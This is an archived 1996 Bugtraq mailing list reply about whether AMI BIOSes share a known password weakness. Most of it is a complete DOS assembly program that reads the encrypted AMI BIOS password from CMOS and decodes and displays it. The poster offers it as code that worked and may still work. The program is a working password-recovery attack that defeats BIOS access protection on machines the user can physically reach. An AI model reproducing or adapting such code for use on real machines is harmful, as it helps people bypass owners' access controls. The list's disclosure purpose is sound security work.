Listserv at NETSPACE.ORG


View:Next message | Previous message
Next in topic | Previous in topic
Next by same author | Previous by same author
Previous menu (November 1996, week 4)
Main BUGTRAQ menu
Search
Options:   Chronological order | Most recent first
Proportional font | Non-proportional font


Date:         Thu, 21 Nov 1996 08:36:25 -0800
Reply-To:     Roger Moar <rmoar@apertos0.csc.UVic.CA>
Sender:       Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From:         Roger Moar <rmoar@apertos0.csc.UVic.CA>
Subject:      Re: BoS:      Magic password of some linux-box(Hardware..)
X-To:         handcuff@concentric.net
In-Reply-To:  <199611202101.QAA17806@cliff.cris.com> from "Brian F. Knoll" at
              Nov 20, 96 09:04:22 pm

> Does anyone know if only the Award BIOS is susceptible to this?  In other
> words, are other BIOSes, such as AMI BIOS, susceptible to the same sort of
> behavior?
>
>     Brian

    I don't really remember where I got the following code, but it
worked a few years ago on a 486 machine. If AMI hasn't changed things
much, it may still work.

-Roger.

----------------------------------------------------------------------

; AMiPSW.ASM - Decodes and displays the Ami-Bios-Password!
; coded by mEsCaL/ThE SkeWerS
; v1.1 Toad Hall Tweak, 12 Mar 95
; - Minor optimizing (just can't resist)
; - Adding some comments
; David Kirschbaum, Toad Hall

CODE    SEGMENT
        ORG     100h
        ASSUME  CS:CODE,DS:CODE

Start   PROC    NEAR
; <-=-> THiS ONE READS THE ENCRYPTED PASSWORD FROM CMOS <-=->

        mov     cl,'['                  ;Bracket the password           v1.1
        call    CharOut                 ;display it                     v1.1

        cld                             ;insure forward                 v1.1
        mov     cl,0b7h                 ;CMOS starting address
;v1.1   lea     di,Password
        mov     di,offset Password      ;                               v1.1
        push    di                      ;save for later                 v1.1
Read_Password:
        mov     al,cl                   ;CMOS address we want
        out     70h,al
        jmp     $+2                     ;delay a tick
        in      al,71h                  ;Get password char
;v1.1   mov     [di],al                 ;stuff in buffer
;v1.1   inc     di                      ;bump
        stosb                           ;stuff in buffer                v1.1
        inc     cl                      ;bump CMOS address
        cmp     cl,0b7h+7               ;done 7 chars yet?
        jnz     Read_Password           ;not yet

; <-=-> NOW, WE HAVE TO DECRYPT CHAR BY CHAR <-=->

;v1.1   lea     di,Password
        pop     di                      ;restore pointer to password    v1.1
        and     byte ptr [di],0f0h      ;mask first char
        inc     di                      ;point to next char
Decrypt_Next:
        cmp     di,Offset Password+7    ;hit end?
        jnl     Completed               ;yep
        cmp     byte ptr [di],0         ;current char a 0?
        jz      Completed               ;yep, 0 terminated

        xor     cl,cl                   ;handy 0
        mov     ch,byte ptr [di-1]      ;get previous char
Decrypt:
        inc     cl                      ;build char in CL
        mov     ah,ch                   ;char to decrypt
        xor     dx,dx
        test    ah,10000000b
        jz      NotSet7
         inc    dh
NotSet7:
        test    ah,01000000b
        jz      NotSet6
         inc    dh
NotSet6:
        test    ah,00000010b
        jz      NotSet2
         inc    dh
NotSet2:
        test    ah,00000001b
        jz      NotSet1
         inc    dh
NotSet1:
        add     dl,2
        cmp     dl,dh
        jl      NotSet1                 ;loop

        sub     dl,dh
        shr     ch,1
        cmp     dl,1
        jnz     $+5
        add     ch,80h
        cmp     ch,byte ptr [di]        ;match next char?
        jnz     Decrypt                 ;nope, continue

; <-=-> AND FiNALLY, WE HAVE TO OUTPUT OUR DECRYPTED CHAR <-=->

        mov     ah,2                    ;display char function
        mov     dl,cl                   ;this char
        int     21h

        inc     di                      ;next char
        jmp     Decrypt_Next            ;loop

; <-=-> THAT'S ALL? WELL, THAN LET'S QUiT DiZ SH**! :-) <-=->

Completed:
        mov     cl,']'                  ;Close the bracket              v1.1
        call    CharOut                 ;display it                     v1.1

        mov     ax,4c00h                ;terminate, ERRORLEVEL 0
        int     21h
Start   ENDP

;v1.1 New function: enter with char to display in CL
CharOut PROC    NEAR                    ;v1.1
        mov     ah,2                    ;display char function
        mov     dl,cl                   ;this char
        int     21h
        ret
CharOut ENDP

;Password DB    6 DUP (?)
Password        label   byte            ;dynamic buffer                 v1.1

CODE    ENDS
        END     Start


--

Roger Moar -- rmoar@csr.uvic.ca | http://apertos0.csc.uvic.ca/~rmoar

Back to: Top of message | Previous menu | Main BUGTRAQ menu


Back to the Listserv archive index for lists hosted at NETSPACE.ORG.
Send problems to listserv-maintainer@netspace.org